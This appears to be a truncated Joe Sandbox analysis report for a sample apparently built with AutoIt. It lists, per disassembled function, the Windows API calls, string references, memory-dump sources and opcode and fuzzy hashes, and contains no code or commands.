Instruction Fuzzy Hash: 6F81F171604301ABC720EB28DC86EAABBAAEFC5714F10491EF5559B3D2DB70DD05CB92

Function 005D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada796584a2957901f10d4e536bf512242e6cf7d338fd0d35ffc9d27f045b7c2
Instruction ID: 3aa11aab2732e68159c0a1bea225eccc0746472abdca8cd35ea2b5bf1b53220f
Opcode Fuzzy Hash: ada796584a2957901f10d4e536bf512242e6cf7d338fd0d35ffc9d27f045b7c2
Instruction Fuzzy Hash: BE715830900509FFCB24CF98C848AAEBF79FF85315F14815AF915AB391C734AA51CBA8

Function 0064F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064F448
_memset.LIBCMT ref: 0064F511
ShellExecuteExW.SHELL32(?), ref: 0064F556

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

Part of subcall function 005EFC86: _wcscpy.LIBCMT ref: 005EFCA9

GetProcessId.KERNEL32(00000000), ref: 0064F5CD
CloseHandle.KERNEL32(00000000), ref: 0064F5FC

Strings

@, xrefs: 0064F525

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 441912c099899e00816a8c9828bad72548448c7ef4f346f3b1bc7cefd3bf7dec
Instruction ID: bb27fa2bc7b58c87039694c311ff3f241127f1d1c998acc7f334a565e920a205
Opcode Fuzzy Hash: 441912c099899e00816a8c9828bad72548448c7ef4f346f3b1bc7cefd3bf7dec
Instruction Fuzzy Hash: E7617275A0061ADFCB14EF58C4859AEBBF6FF89310F14846AE855AB351CB30AD41CF90

Function 00630F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00630F8C
GetKeyboardState.USER32(?), ref: 00630FA1
SetKeyboardState.USER32(?), ref: 00631002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00631030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0063104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00631095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006310B8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1308fb5dfa057c8616c0817bf9b26d8a0bb38c7cec2d5bb1117ca6c26aab6f0c
Instruction ID: 71c338b35bbfcfbb1d7508b3abc20579963ecbb1cb0fa45044e72e9d7d42269d
Opcode Fuzzy Hash: 1308fb5dfa057c8616c0817bf9b26d8a0bb38c7cec2d5bb1117ca6c26aab6f0c
Instruction Fuzzy Hash: 5451E1A0A047D53DFB3642348C15BFABEAB5B07304F08898DE1D48A9D2C799ECC9D791

Function 00630D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00630DA5
GetKeyboardState.USER32(?), ref: 00630DBA
SetKeyboardState.USER32(?), ref: 00630E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00630E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00630E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00630EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00630EC9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3232298fc0938df729df82f68671b91c1693519934ff8d48041c7dc89994f437
Instruction ID: 56b6f07e420492d3409bc16542a85da2014896af928c6827167a66bc36c4542c
Opcode Fuzzy Hash: 3232298fc0938df729df82f68671b91c1693519934ff8d48041c7dc89994f437
Instruction Fuzzy Hash: 1451E6A0A447D53DFB3683748C65BBA7EEA5F06300F08888DE1D44A9C2D395EC9CD790

Function 006355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0063560A
_wcsncpy.LIBCMT ref: 0063563F
_wcsncpy.LIBCMT ref: 00635671
_wcsncpy.LIBCMT ref: 006356A4
_wcsncpy.LIBCMT ref: 006356E6
_wcsncpy.LIBCMT ref: 00635720
_wcsncpy.LIBCMT ref: 0063574F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 85b6b89f748c471f6098307592fd49654a81ddd9b92eed2aefe5ed57975913e1
Instruction ID: 8ab4a28f598a2e8c57179b8034f03348f6fd61dd39409ea4d8ffa08bc76d5c82
Opcode Fuzzy Hash: 85b6b89f748c471f6098307592fd49654a81ddd9b92eed2aefe5ed57975913e1
Instruction Fuzzy Hash: 2A41B375C1121976CB11EBF4884E9DFB7BDBF85310F508856E609E3221EB38A245C7E6

Function 0065A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

P[, xrefs: 0065A099, 0065A133

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: P[
API String ID: 0-2517523118
Opcode ID: 2bf08f5820b66016c84f4365c9dbe8df1a5d0c8c27c34951655c30e373eb3e29
Instruction ID: 06953fa2b2b4689425471c7daa23b026436b4d37c3fa4d9ee532436d76cde4c3
Opcode Fuzzy Hash: 2bf08f5820b66016c84f4365c9dbe8df1a5d0c8c27c34951655c30e373eb3e29
Instruction Fuzzy Hash: 44419E35904614AFD720DFA8CC48FE9BBAAAB09312F140365ED16A73E1CB30AD59DA51

Function 0062D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0062D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0062D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0062D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0062D69D

Strings

,,f, xrefs: 0062D578
DllGetClassObject, xrefs: 0062D610

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,f$DllGetClassObject
API String ID: 753597075-21257640
Opcode ID: b870fbca46fea18f449473e49134dc69c6f4d450f28bf33d065fd7cb2b420c20
Instruction ID: ba93fdc8fe560df03b125cfef01ddc7bdc2ce9295c069514e42698e073e0368d
Opcode Fuzzy Hash: b870fbca46fea18f449473e49134dc69c6f4d450f28bf33d065fd7cb2b420c20
Instruction Fuzzy Hash: D0418CB1600A24EFDB15DF64D884A9ABBABEF44314F1581ADEC099F205D7B1D944CFA0

Function 00633671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0063466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00633697,?), ref: 0063468B

Part of subcall function 0063466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00633697,?), ref: 006346A4

lstrcmpiW.KERNEL32(?,?), ref: 006336B7
_wcscmp.LIBCMT ref: 006336D3
MoveFileW.KERNEL32(?,?), ref: 006336EB
_wcscat.LIBCMT ref: 00633733
SHFileOperationW.SHELL32(?), ref: 0063379F

Strings

\*.*, xrefs: 0063372D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 75499a569af5770ae15adae5a1d391f75dacbc645959fa6a86c11fbd0a00d19b
Instruction ID: 6ba32d5c35483e231ecef148b79f3eeb01631b22d3d69abf069b92bc922870e6
Opcode Fuzzy Hash: 75499a569af5770ae15adae5a1d391f75dacbc645959fa6a86c11fbd0a00d19b
Instruction Fuzzy Hash: ED41A2B1108345AEC751EF64C4469DFB7E9AF89340F00192EB49AC3351EB34D689C796

Function 00650FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00650FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00650FFE
FreeLibrary.KERNEL32(00000000), ref: 006510B5

Part of subcall function 00650FA5: RegCloseKey.ADVAPI32(?), ref: 0065101B
Part of subcall function 00650FA5: FreeLibrary.KERNEL32(?), ref: 0065106D
Part of subcall function 00650FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00651090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00651058

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 558f3e2b581e6168ba6287a7bfd64e15130fc38b6c2e57350744c4bf3a05844e
Instruction ID: 5d707ab9574d13150a401bdff9048135386121d0abc3e240dcf8753137620e4c
Opcode Fuzzy Hash: 558f3e2b581e6168ba6287a7bfd64e15130fc38b6c2e57350744c4bf3a05844e
Instruction Fuzzy Hash: 0E313071900209BFEB15DF90DC89EFFB7BDEF09311F040169E901E6281DB749E899AA0

Function 00646173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00647D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00647DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006461C6
WSAGetLastError.WSOCK32(00000000), ref: 006461D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0064620E
connect.WSOCK32(00000000,?,00000010), ref: 00646217
WSAGetLastError.WSOCK32 ref: 00646221
closesocket.WSOCK32(00000000), ref: 0064624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00646263

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: c228af1ce65ebc4cb75ec3d7c336305586f095d9415eb66a374375db360e32c1
Instruction ID: 5895677904cd69de7c212864bab089fef8e9c7a3b4e71b3345dd304dd57d0d21
Opcode Fuzzy Hash: c228af1ce65ebc4cb75ec3d7c336305586f095d9415eb66a374375db360e32c1
Instruction Fuzzy Hash: 63318431600214ABDF10EF64DC85BBE7BBEEF45751F04402AF905E7291DB70AD049BA2

Function 0062F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0062F671
__wcsnicmp.LIBCMT ref: 0062F692
__wcsnicmp.LIBCMT ref: 0062F6AC

Strings

#notrayicon, xrefs: 0062F669
#OnAutoItStartRegister, xrefs: 0062F6A6
#requireadmin, xrefs: 0062F68C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 039236917b243c0b0675568bf729747f0ebc9390b77d168e2ee4a54b0118255e
Instruction ID: ef95bd7a81998941455ba32bbc154c6472419932e835219adf1602a80f4c6231
Opcode Fuzzy Hash: 039236917b243c0b0675568bf729747f0ebc9390b77d168e2ee4a54b0118255e
Instruction Fuzzy Hash: 86219772204D3266D330BB34FC06EF773AAEF95380F14403AF94286291EB919D46CB90

Function 006575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005D1D73
Part of subcall function 005D1D35: GetStockObject.GDI32(00000011), ref: 005D1D87
Part of subcall function 005D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00657632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0065763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0065764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00657659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00657665

Strings

Msctls_Progress32, xrefs: 00657603

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b247f94ec5a981cadde888363d67cceaf9baaa98428f125fd529c78bbb8d4031
Instruction ID: aa4c81dd5bfc056953fb96e19cd93522813ab00d2a830ddc2aec304d9d8245c6
Opcode Fuzzy Hash: b247f94ec5a981cadde888363d67cceaf9baaa98428f125fd529c78bbb8d4031
Instruction Fuzzy Hash: 9F11B2B2110219BFEF159F64CC85EE77F6EEF08798F014115BA04A61A0CB72AC21DBA4

Function 0065B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065B644
_memset.LIBCMT ref: 0065B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00696F20,00696F64), ref: 0065B682
CloseHandle.KERNEL32 ref: 0065B694

Strings

doi, xrefs: 0065B64D
oi, xrefs: 0065B63E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oi$doi
API String ID: 3277943733-2312420176
Opcode ID: 4672561de7d9c82de855e24743f947735d109fb369a54fee71912a28cd4ccb1a
Instruction ID: 88b95082cf80cd178cc024dbb94fceaaf9fd1d0d92ffc216b0891c35d4e8b454
Opcode Fuzzy Hash: 4672561de7d9c82de855e24743f947735d109fb369a54fee71912a28cd4ccb1a
Instruction Fuzzy Hash: 80F0FEF25403047AF7106B65FC0AFBB7E9FEB09795F005021BA08E65A2D7755C1187A8

Function 005F406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005F3F85), ref: 005F4085
GetProcAddress.KERNEL32(00000000), ref: 005F408C
EncodePointer.KERNEL32(00000000), ref: 005F4097
DecodePointer.KERNEL32(005F3F85), ref: 005F40B2

Strings

combase.dll, xrefs: 005F4080
RoUninitialize, xrefs: 005F4074

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: b301b3f3b44cc17c7a8fe3f61d4d1f630e3dad1569da41dc0e9e57bffed19a63
Instruction ID: 2ded83c9400d00a756a0e64ee2852c07d006dfe7e3ab80f9091470411215ef3e
Opcode Fuzzy Hash: b301b3f3b44cc17c7a8fe3f61d4d1f630e3dad1569da41dc0e9e57bffed19a63
Instruction Fuzzy Hash: D9E0B670581711EFEB20EF61EC0DB263AABBB04783F106026F205E5AB0CFB64604CE54

Function 006364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0063660B
_memmove.LIBCMT ref: 00636546

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

_memmove.LIBCMT ref: 006365B9
_memmove.LIBCMT ref: 006366A0
_memmove.LIBCMT ref: 006366B9
_memmove.LIBCMT ref: 006366D5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
Instruction ID: 0ea14fc9559b6a1a3afbe726a32061f7b478fff991f425c42bb99b5b2e65d93d
Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
Instruction Fuzzy Hash: FB61A03190065AABCF11EF64CC86EFE3BAABF85308F04851AF9555B292DB34DC05DB91

Function 006501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 00650E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0064FDAD,?,?), ref: 00650E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006502BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006502FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00650320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00650349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0065038C
RegCloseKey.ADVAPI32(00000000), ref: 00650399

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: a6c5c98bf625d05874f9a8d5938824e012993e1d9ad114dc04af3eab26ec41e8
Instruction ID: 76269ab55728fae966afca1bb971b8ca52e196d1cabdeb1b249d7ff905764fe7
Opcode Fuzzy Hash: a6c5c98bf625d05874f9a8d5938824e012993e1d9ad114dc04af3eab26ec41e8
Instruction Fuzzy Hash: 85515C31108305AFD714EF68C859EAEBBEAFF84314F04491EF945872A2DB31E909CB52

Function 00655799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006557FB
GetMenuItemCount.USER32(00000000), ref: 00655832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0065585A
GetMenuItemID.USER32(?,?), ref: 006558C9
GetSubMenu.USER32(?,?), ref: 006558D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00655928

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
